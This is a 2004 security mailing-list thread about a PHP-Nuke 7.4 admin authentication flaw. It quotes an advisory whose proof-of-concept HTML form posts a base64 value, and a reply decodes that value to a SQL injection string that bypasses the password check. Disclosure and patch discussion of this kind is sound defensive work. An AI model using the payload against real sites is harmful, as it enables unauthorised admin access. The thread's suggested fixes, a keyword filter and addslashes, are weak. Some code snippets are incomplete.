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Re: [XSS] PHP-Nuke 7.4 Bugs

From: Peter Lowe <pgl () yoyo org>
Date: Wed, 8 Sep 2004 20:56:09 +0200

I don't know much about the bug itself, but if it's an SQL injection bug
doing a case-insensitive search for "select" probably isn't going to fix
it properly. What if it was an update changing the admin password? Or a
query dropping the table as a DoS? Etc. Adding

        $aid = addslashes($aid);

beforehand seems like a more sensible "fix".



On Sep 05, Blaine Elzey wrote:
This seems like more of a SQL injection bug.

$admin value "eCcgVU5JT04gU0VMRUNUIDEvKjox" decodes to "x' UNION SELECT 1/*:1"
which will cause the pwd check to be manipulated into union selecting the
valid password.

7.4 Patch can be in auth.php, replace line (about) 61
  if ($aid=="" || $pwd=="") {
  if ($aid=="" || $pwd=="" || stristr($aid,'select')) {

I don't know if 7.5 is also vulnerable.

Blaine Elzey 
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---------- Original Message -----------
From: Pierquinto Manco <mantra () ntj it>
To: bugtraq () securityfocus com
Sent: 4 Sep 2004 08:19:26 -0000
Subject: [XSS] PHP-Nuke 7.4 ViewAdmin Bug

*                   CODEBUG Labs
* Advisory #3
* Title: ViewAdmin Bug
* Author: Pierquinto 'Mantra' Manco
* Product: PHP-Nuke 7.4
* Type: XSS
* Web: http://www.mantralab.org

                  View Admin Bug

- ) Description
PHP-Nuke is a very bugged web CMS, version 7.4 has critical
XSS bug that permit to an attacker to view Admin account aid 
and to use this information to delete account using Delete Admin Bug 
This bug is very old too but we can bypass the patch sending data 
by POST instead of GET.

- ) Proof-of-Concept
Create a HTML file with this lines:

<form name="form1" method="POST"
    <input type="hidden" name="admin" value="eCcgVU5JT04gU0VMRUNUIDEvKjox">
    <input type="hidden" name="add_radminsuper" value="1">
    <input type="hidden" name="op" value="mod_authors">
      <input type="submit" name="Submit" value="Display">

- ) Patch

Apply this code to your admin.php file:

if ( !empty($HTTP_GET_VARS['op']) ) {
    $op = $HTTP_GET_VARS['op'];

if ( !empty($HTTP_POST_VARS['op']) ) {
    $op = $HTTP_POST_VARS['op'];

-) Note

There are a lot of this problem in PHP-Nuke 7.4, my patch will check
the content of $_POST[op] and $_GET[op].
I'm going to post all this vulnerabilities on my site...

------- End of Original Message -------

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